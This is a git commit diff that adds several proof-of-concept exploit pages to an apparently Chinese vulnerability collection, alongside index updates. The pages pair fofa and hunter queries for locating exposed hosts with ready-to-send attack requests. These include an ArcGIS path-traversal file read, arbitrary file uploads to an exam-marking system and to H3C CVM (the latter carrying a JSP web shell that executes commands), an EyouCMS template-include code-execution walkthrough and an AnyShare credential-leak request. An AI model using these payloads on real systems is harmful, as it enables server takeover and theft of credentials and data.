update

MrWQ · Nov 8, 2024 · 0f7a7fe · 0f7a7fe
1 parent afd3599
commit 0f7a7fe
Show file tree

Hide file tree

Showing 61 changed files with 1,109 additions and 0 deletions.
diff --git a/docs/POC/ArcGIS/ArcGIS地理信息系统任意文件读取漏洞.md b/docs/POC/ArcGIS/ArcGIS地理信息系统任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# ArcGIS地理信息系统任意文件读取漏洞
+
+ArcGIS地理信息系统 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+app="esri-ArcGIS"
+```
+
+## poc
+
+```javascript
+GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241106172857303](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061728383.png)
diff --git a/docs/POC/ArcGIS/README.md b/docs/POC/ArcGIS/README.md
@@ -0,0 +1 @@
+* [./POC/ArcGIS/ArcGIS地理信息系统任意文件读取漏洞](/POC/ArcGIS/ArcGIS%E5%9C%B0%E7%90%86%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/EDU/README.md b/docs/POC/EDU/README.md
@@ -1,3 +1,4 @@
+* [/POC/EDU/衡水金航/](/POC/EDU/%E8%A1%A1%E6%B0%B4%E9%87%91%E8%88%AA/)
 * [./POC/EDU/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞](/POC/EDU/%E7%91%9E%E6%A0%BC%E6%99%BA%E6%85%A7%E5%BF%83%E7%90%86%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0NPreenSMSList.asmx%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md)
 * [./POC/EDU/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞](/POC/EDU/%E9%AB%98%E6%A0%A1%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FReportServer%E5%AD%98%E5%9C%A8%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md)
 * [./POC/EDU/EDU某智慧平台ExpDownloadService.aspx任意文件读取漏洞](/POC/EDU/EDU%E6%9F%90%E6%99%BA%E6%85%A7%E5%B9%B3%E5%8F%B0ExpDownloadService.aspx%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md)

diff --git a/docs/POC/EDU/衡水金航/README.md b/docs/POC/EDU/衡水金航/README.md
@@ -0,0 +1 @@
+* [./POC/EDU/衡水金航/金航网上阅卷系统fileUpload任意文件上传漏洞](/POC/EDU/%E8%A1%A1%E6%B0%B4%E9%87%91%E8%88%AA/%E9%87%91%E8%88%AA%E7%BD%91%E4%B8%8A%E9%98%85%E5%8D%B7%E7%B3%BB%E7%BB%9FfileUpload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/EDU/衡水金航/金航网上阅卷系统fileUpload任意文件上传漏洞.md b/docs/POC/EDU/衡水金航/金航网上阅卷系统fileUpload任意文件上传漏洞.md
@@ -0,0 +1,40 @@
+# 金航网上阅卷系统fileUpload任意文件上传漏洞
+
+衡水金航计算机科技有限公司是一家长期致力于图像标记识别采集技术及信息管理系统的软件企业。金航网上阅卷系统：可以广泛地应用于高考、中考、教育局组织的学校联考、各类学校自组织考试、各种行业考试、职称考试等。衡水金航计算机科技有限公司金航网上阅卷系统 fileUpload 任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+## hunter
+
+```javascript
+web.body="js/insteadSelect/jquery.insteadSelect.css"
+```
+
+## poc
+
+```javascript
+POST /fileUpload HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 351
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="upload"; filename="poc.jsp"
+Content-Type: application/pdf
+
+<%out.println("1234");%>
+--00content0boundary00
+Content-Disposition: form-data; name="uploadContentType"
+
+pdf
+--00content0boundary00
+Content-Disposition: form-data; name="uploadFileName"
+
+1.jsp
+--00content0boundary00--
+```
+
+![image-20241107235030738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411072350903.png)
+
+文件路径：`/upload/poc.jsp`
diff --git a/docs/POC/EyouCMS/EyouCMS文件包含RCE漏洞.md b/docs/POC/EyouCMS/EyouCMS文件包含RCE漏洞.md
@@ -0,0 +1,73 @@
+## EyouCMS文件包含RCE漏洞
+
+First, download the latest source code from the official website:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736654.png)
+After downloading, use PHPStudy Pro to set up the website:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736275.png)
+Proceed with the installation process, setting up the database information and admin password:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736805.png)
+In the admin panel, verify that the current version is the latest:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736228.png)
+Prepare a malicious payload in the form of an image, utilizing Remote Code Execution (RCE) via template file inclusion:
+
+```
+GIF89a
+<?php phpinfo();?>
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736384.png)
+Upload the image payload:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736923.png)
+Choose the WeChat public account interface:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736602.png)
+Proceed with the upload and obtain the returned path:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736696.png)
+
+```
+uploads/allimg/20230901/1-230Z1151QR14.gif
+```
+Return to the template configuration, set up security questions:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736323.png)
+After configuring security questions, edit the "index.htm" template under the PC section:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737706.png)Input the following payload:
+
+```
+{eyou:include file="uploads/allimg/20230901/1-230Z1151QR14.gif" /}
+```
+Append it at the end:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737598.png)
+After submission:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737557.png)
+Return to the homepage, where arbitrary code execution can be observed:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737266.png)
+
+## Code Audit
+Firstly, the `eyou:include` tag is present in the list of parsed tags, and there is no filtering mechanism applied to it:
+```
+core\library\think\Template.php
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737623.png)
+The template file "index.htm" is read and stored in the `$content` variable. Parsing takes place in "core\library\think\Template.php":![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737286.png)
+We can observe the `parseEyouInclude` function:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737366.png)
+Inside this function, the template is analyzed and processed, where we can see that only string operations are performed, and no security risk evaluation is conducted:![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737380.png)
+Finally, at the end, the tags are replaced and returned:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737460.png)
+Due to the absence of security filtering, the include tag's parsing result directly reads and replaces content:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737841.png)
+Similarly, in the "Template.php" file, writing to the cache occurs:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737357.png)
+Digging deeper:
+
+```
+core\library\think\template\driver\File.php
+```
+In the `write` method, content is directly written:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737034.png)
+Cache directory:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737865.png)
+Ultimately, in the `read` method of "File.php," the temporarily generated file is included, leading to Remote Code Execution (RCE):
+
+```
+core\library\think\template\driver\File.php
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061738568.png)
diff --git a/docs/POC/EyouCMS/README.md b/docs/POC/EyouCMS/README.md
@@ -0,0 +1 @@
+* [./POC/EyouCMS/EyouCMS文件包含RCE漏洞](/POC/EyouCMS/EyouCMS%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABRCE%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/H3C/H3C-CVM-fd接口前台任意文件上传漏洞复现.md b/docs/POC/H3C/H3C-CVM-fd接口前台任意文件上传漏洞复现.md
@@ -0,0 +1,39 @@
+## H3C-CVM-fd接口前台任意文件上传漏洞复现
+
+ H3C CVM /cas/fileUpload/fd 接口存在任意文件上传漏洞，未授权的攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。
+
+## fofa
+
+```javascript
+app="H3C-CVM"
+```
+
+## poc
+
+```javascript
+POST /cas/fileUpload/fd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.123 Safari/537.36
+Connection: close
+Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Connection: close
+
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Content-Disposition: form-data; name="token"
+
+/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4
+Content-Disposition: form-data; name="file"; filename="a.jsp"
+Content-Type: image/png
+
+<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--WebKitFormBoundaryMMqEBbEFHlzOcYq4--
+```
+
+![image-20241106171738287](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061717362.png)
+
+访问文件路径
+
+```
+/cas/js/lib/buttons/a.jsp
+```
diff --git a/docs/POC/H3C/README.md b/docs/POC/H3C/README.md
@@ -5,6 +5,7 @@
 * [./POC/H3C/H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞](/POC/H3C/H3C%20%E7%94%A8%E6%88%B7%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%20dynamiccontent.properties.xhtml%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md)
 * [./POC/H3C/H3C路由器userLogin.asp信息泄漏漏洞](/POC/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md)
 * [./POC/H3C/H3C网络管理系统任意文件读取漏洞](/POC/H3C/H3C%E7%BD%91%E7%BB%9C%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md)
+* [./POC/H3C/H3C-CVM-fd接口前台任意文件上传漏洞复现](/POC/H3C/H3C-CVM-fd%E6%8E%A5%E5%8F%A3%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md)
 * [./POC/H3C/H3C Magic B1STV100R012 RCE](/POC/H3C/H3C%20Magic%20B1STV100R012%20RCE.md)
 * [./POC/H3C/H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞](/POC/H3C/H3C-iMC%E6%99%BA%E8%83%BD%E7%AE%A1%E7%90%86%E4%B8%AD%E5%BF%83autoDeploy.xhtml%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md)
 * [./POC/H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)](/POC/H3C/H3C_magic_R100%E8%B7%AF%E7%94%B1%E5%99%A8%E7%9A%84UDPserver%E4%B8%AD%E5%AD%98%E5%9C%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2022-34598%29.md)

diff --git a/docs/POC/README.md b/docs/POC/README.md
@@ -9,6 +9,7 @@
 * [/POC/LVS精益价值管理系统/](/POC/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/)
 * [/POC/多客圈子论坛系统/](/POC/%E5%A4%9A%E5%AE%A2%E5%9C%88%E5%AD%90%E8%AE%BA%E5%9D%9B%E7%B3%BB%E7%BB%9F/)
 * [/POC/Cobbler/](/POC/Cobbler/)
+* [/POC/ZKBioSecurity/](/POC/ZKBioSecurity/)
 * [/POC/Typora/](/POC/Typora/)
 * [/POC/深澜计费管理系统/](/POC/%E6%B7%B1%E6%BE%9C%E8%AE%A1%E8%B4%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/)
 * [/POC/微擎/](/POC/%E5%BE%AE%E6%93%8E/)
@@ -114,6 +115,7 @@
 * [/POC/D-Link/](/POC/D-Link/)
 * [/POC/大唐电信/](/POC/%E5%A4%A7%E5%94%90%E7%94%B5%E4%BF%A1/)
 * [/POC/Public CMS/](/POC/Public%20CMS/)
+* [/POC/ArcGIS/](/POC/ArcGIS/)
 * [/POC/JetBrains/](/POC/JetBrains/)
 * [/POC/医药信息管理系统/](/POC/%E5%8C%BB%E8%8D%AF%E4%BF%A1%E6%81%AF%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/)
 * [/POC/深信服/](/POC/%E6%B7%B1%E4%BF%A1%E6%9C%8D/)
@@ -190,6 +192,7 @@
 * [/POC/HSF/](/POC/HSF/)
 * [/POC/cockpit/](/POC/cockpit/)
 * [/POC/Spring/](/POC/Spring/)
+* [/POC/广州锦铭泰软件/](/POC/%E5%B9%BF%E5%B7%9E%E9%94%A6%E9%93%AD%E6%B3%B0%E8%BD%AF%E4%BB%B6/)
 * [/POC/OpenCart/](/POC/OpenCart/)
 * [/POC/Salia/](/POC/Salia/)
 * [/POC/Gradio/](/POC/Gradio/)
@@ -256,6 +259,7 @@
 * [/POC/DCN/](/POC/DCN/)
 * [/POC/朗新天霁人力资源管理系统/](/POC/%E6%9C%97%E6%96%B0%E5%A4%A9%E9%9C%81%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/)
 * [/POC/MajorDoMo/](/POC/MajorDoMo/)
+* [/POC/上海爱数信息/](/POC/%E4%B8%8A%E6%B5%B7%E7%88%B1%E6%95%B0%E4%BF%A1%E6%81%AF/)
 * [/POC/Metabase/](/POC/Metabase/)
 * [/POC/六零导航页/](/POC/%E5%85%AD%E9%9B%B6%E5%AF%BC%E8%88%AA%E9%A1%B5/)
 * [/POC/志华软件/](/POC/%E5%BF%97%E5%8D%8E%E8%BD%AF%E4%BB%B6/)
@@ -266,7 +270,9 @@
 * [/POC/QQ/](/POC/QQ/)
 * [/POC/资管云/](/POC/%E8%B5%84%E7%AE%A1%E4%BA%91/)
 * [/POC/Panel/](/POC/Panel/)
+* [/POC/瀚霖科技股份有限公司/](/POC/%E7%80%9A%E9%9C%96%E7%A7%91%E6%8A%80%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8/)
 * [/POC/华望云/](/POC/%E5%8D%8E%E6%9C%9B%E4%BA%91/)
+* [/POC/上海鸽蛋网络/](/POC/%E4%B8%8A%E6%B5%B7%E9%B8%BD%E8%9B%8B%E7%BD%91%E7%BB%9C/)
 * [/POC/Joomla/](/POC/Joomla/)
 * [/POC/F5-BIG-IP/](/POC/F5-BIG-IP/)
 * [/POC/OrangeHRM/](/POC/OrangeHRM/)
@@ -311,6 +317,7 @@
 * [/POC/LiveBOS/](/POC/LiveBOS/)
 * [/POC/东方通/](/POC/%E4%B8%9C%E6%96%B9%E9%80%9A/)
 * [/POC/金慧综合管理信息系统/](/POC/%E9%87%91%E6%85%A7%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F/)
+* [/POC/聚合支付/](/POC/%E8%81%9A%E5%90%88%E6%94%AF%E4%BB%98/)
 * [/POC/泛微OA/](/POC/%E6%B3%9B%E5%BE%AEOA/)
 * [/POC/群杰印章物联网管理平台/](/POC/%E7%BE%A4%E6%9D%B0%E5%8D%B0%E7%AB%A0%E7%89%A9%E8%81%94%E7%BD%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0/)
 * [/POC/Elgg/](/POC/Elgg/)
@@ -322,6 +329,7 @@
 * [/POC/XXL-JOB/](/POC/XXL-JOB/)
 * [/POC/Adobe ColdFusion/](/POC/Adobe%20ColdFusion/)
 * [/POC/联奕统一身份认证平台/](/POC/%E8%81%94%E5%A5%95%E7%BB%9F%E4%B8%80%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E5%B9%B3%E5%8F%B0/)
+* [/POC/Vben-Admin/](/POC/Vben-Admin/)
 * [/POC/php/](/POC/php/)
 * [/POC/契约锁电子签章系统/](/POC/%E5%A5%91%E7%BA%A6%E9%94%81%E7%94%B5%E5%AD%90%E7%AD%BE%E7%AB%A0%E7%B3%BB%E7%BB%9F/)
 * [/POC/WAGO/](/POC/WAGO/)
@@ -405,6 +413,7 @@
 * [/POC/大华/](/POC/%E5%A4%A7%E5%8D%8E/)
 * [/POC/私有云管理平台/](/POC/%E7%A7%81%E6%9C%89%E4%BA%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0/)
 * [/POC/世邦通信/](/POC/%E4%B8%96%E9%82%A6%E9%80%9A%E4%BF%A1/)
+* [/POC/和信创天/](/POC/%E5%92%8C%E4%BF%A1%E5%88%9B%E5%A4%A9/)
 * [/POC/亿华人力资源管理系统/](/POC/%E4%BA%BF%E5%8D%8E%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/)
 * [/POC/飞鱼星/](/POC/%E9%A3%9E%E9%B1%BC%E6%98%9F/)
 * [/POC/华测监测预警系统/](/POC/%E5%8D%8E%E6%B5%8B%E7%9B%91%E6%B5%8B%E9%A2%84%E8%AD%A6%E7%B3%BB%E7%BB%9F/)
@@ -418,6 +427,8 @@
 * [/POC/联达OA/](/POC/%E8%81%94%E8%BE%BEOA/)
 * [/POC/鸿宇科技/](/POC/%E9%B8%BF%E5%AE%87%E7%A7%91%E6%8A%80/)
 * [/POC/DataGear/](/POC/DataGear/)
+* [/POC/EyouCMS/](/POC/EyouCMS/)
+* [/POC/成都索贝数码科技/](/POC/%E6%88%90%E9%83%BD%E7%B4%A2%E8%B4%9D%E6%95%B0%E7%A0%81%E7%A7%91%E6%8A%80/)
 * [/POC/金华迪加/](/POC/%E9%87%91%E5%8D%8E%E8%BF%AA%E5%8A%A0/)
 * [/POC/Splunk Enterprise/](/POC/Splunk%20Enterprise/)
 * [/POC/电信网关配置管理/](/POC/%E7%94%B5%E4%BF%A1%E7%BD%91%E5%85%B3%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86/)

diff --git a/docs/POC/Vben-Admin/README.md b/docs/POC/Vben-Admin/README.md
@@ -0,0 +1 @@
+* [./POC/Vben-Admin/Vben-Admin存在硬编码漏洞](/POC/Vben-Admin/Vben-Admin%E5%AD%98%E5%9C%A8%E7%A1%AC%E7%BC%96%E7%A0%81%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/Vben-Admin/Vben-Admin存在硬编码漏洞.md b/docs/POC/Vben-Admin/Vben-Admin存在硬编码漏洞.md
@@ -0,0 +1,25 @@
+# Vben-Admin存在硬编码漏洞
+<font style="color:rgba(0, 0, 0, 0.84);">Vue Vben Admin是一个免费开源的中端和后端模板。采用最新的vue3、vite、TypeScript等主流技术开发，开箱即用的中后端前端解决方案也可供学习参考。Vue Vben存在硬编码漏洞</font>
+
+## fofa
+```javascript
+icon_hash="-317536629"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729264064913-c5ad6880-499b-442e-9fee-00d4eb8fa551.png)
+
+## poc
+登录页面，右击查看源代码，搜索index，进入该js页面
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100317021-035ebb28-c6be-490c-aaf7-20bdc01dab17.png)
+
+该页面硬编码登录账号密码
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100355251-30a27295-5a99-4dc4-8114-4859ca2fb8eb.png)
+
+使用账号密码登录系统
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730128898635-bddc9b02-c118-4394-87d6-316664320abb.png)
+
+
+
diff --git a/docs/POC/ZKBioSecurity/README.md b/docs/POC/ZKBioSecurity/README.md
@@ -0,0 +1 @@
+* [./POC/ZKBioSecurity/ZKBioSecurity存在shiro反序列漏洞](/POC/ZKBioSecurity/ZKBioSecurity%E5%AD%98%E5%9C%A8shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/ZKBioSecurity/ZKBioSecurity存在shiro反序列漏洞.md b/docs/POC/ZKBioSecurity/ZKBioSecurity存在shiro反序列漏洞.md
@@ -0,0 +1,19 @@
+# ZKBioSecurity存在shiro反序列漏洞
+
+ZKBioSecurity平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。
+
+## fofa
+
+```javascript
+title=="ZKBioSecurity" && body="Automatic login within two weeks"
+```
+
+## poc
+
+利用工具
+
+```
+https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0
+```
+
+![image-20241106225639218](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062256286.png)
diff --git a/docs/POC/上海爱数信息/README.md b/docs/POC/上海爱数信息/README.md
@@ -0,0 +1 @@
+* [./POC/上海爱数信息/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞](/POC/%E4%B8%8A%E6%B5%B7%E7%88%B1%E6%95%B0%E4%BF%A1%E6%81%AF/%E7%88%B1%E6%95%B0AnyShare%E6%99%BA%E8%83%BD%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0Usrm_GetAllUsers%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/上海爱数信息/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md b/docs/POC/上海爱数信息/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md
@@ -0,0 +1,25 @@
+# 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞
+
+爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 接口存在信息泄露漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息。可登录后台，使系统处于极不安全状态。
+
+## fofa
+
+```javascript
+app="AISHU-AnyShare"
+```
+
+## poc
+
+```javascript
+OST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+[1,100]
+```
+
+![image-20241108205715836](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082057919.png)
diff --git a/docs/POC/上海鸽蛋网络/README.md b/docs/POC/上海鸽蛋网络/README.md
@@ -0,0 +1 @@
+* [./POC/上海鸽蛋网络/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞](/POC/%E4%B8%8A%E6%B5%B7%E9%B8%BD%E8%9B%8B%E7%BD%91%E7%BB%9C/Teaching%E5%9C%A8%E7%BA%BF%E6%95%99%E5%AD%A6%E5%B9%B3%E5%8F%B0getDictItemsByTable%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md)
diff --git a/docs/POC/上海鸽蛋网络/新建文本文档.txt → ...hing在线教学平台getDictItemsByTable存在sql注入漏洞.md b/docs/POC/上海鸽蛋网络/新建文本文档.txt → ...hing在线教学平台getDictItemsByTable存在sql注入漏洞.md
diff --git a/docs/POC/东胜物流软件/README.md b/docs/POC/东胜物流软件/README.md
@@ -1 +1,2 @@
+* [./POC/东胜物流软件/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞](/POC/%E4%B8%9C%E8%83%9C%E7%89%A9%E6%B5%81%E8%BD%AF%E4%BB%B6/%E4%B8%9C%E8%83%9C%E7%89%A9%E6%B5%81%E8%BD%AF%E4%BB%B6AttributeAdapter.aspx%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md)
 * [./POC/东胜物流软件/东胜物流软件GetProParentModuTreeList存在SQL注入漏洞](/POC/%E4%B8%9C%E8%83%9C%E7%89%A9%E6%B5%81%E8%BD%AF%E4%BB%B6/%E4%B8%9C%E8%83%9C%E7%89%A9%E6%B5%81%E8%BD%AF%E4%BB%B6GetProParentModuTreeList%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md)